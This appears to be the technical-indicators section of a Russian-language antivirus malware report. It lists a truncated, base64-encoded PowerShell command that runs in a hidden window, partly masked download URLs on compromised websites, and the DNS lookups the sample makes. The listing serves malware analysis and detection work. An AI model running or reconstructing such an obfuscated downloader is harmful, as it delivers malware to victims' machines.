Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABKADQAYgAzAGkAeQAzAD0AKAAnAE8ANQAnACsAKAAnAHgAJwArACcAOQB2AGMAJwApACsAJwBtACcAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdQBTAEUAUgBQAFIAbw...
- http://www.li#####paganda.com.br/ALFA_DATA/TYxyEymux/
- http://www.cp#.com.bd/wp-admin/08avd9/
- http://we######nslosangeles.com/a/1lRI7/
- http://th###ncept.am/wp-admin/Tl/
- http://www.ch###ekl.org/wp-includes/Z00fN98Iq/
- DNS ASK li#####paganda.com.br
- DNS ASK cp#.com.bd
- DNS ASK we######nslosangeles.com
- DNS ASK xi#o.tv
- DNS ASK cs.##acg.xyz
- DNS ASK th###ncept.am
- DNS ASK ch###ekl.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABKADQAYgAzAGkAeQAzAD0AKAAnAE8ANQAnACsAKAAnAHgAJwArACcAOQB2AGMAJwApACsAJwBtACcAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdQBTAEUAUgBQAFIAbw...' (со скрытым окном)